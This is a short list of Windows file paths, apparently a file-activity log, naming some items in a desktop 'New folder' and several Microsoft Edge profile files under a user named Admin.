C:\Users\Admin\Desktop\New folder\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001f.db
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
C:\Users\Admin\Desktop\New folder\edge_shutdown_ms.txt
C:\Users\Admin\Desktop\New folder\Apps.index
C:\Users\Admin\Desktop\New folder\0.0.filtertrie.intermediate.txt
C:\Users\Admin\Desktop\New folder\0.1.filtertrie.intermediate.txt
C:\Users\Admin\Desktop\New folder\0.2.filtertrie.intermediate.txt
C:\Users\Admin\Desktop\New folder\Apps.ft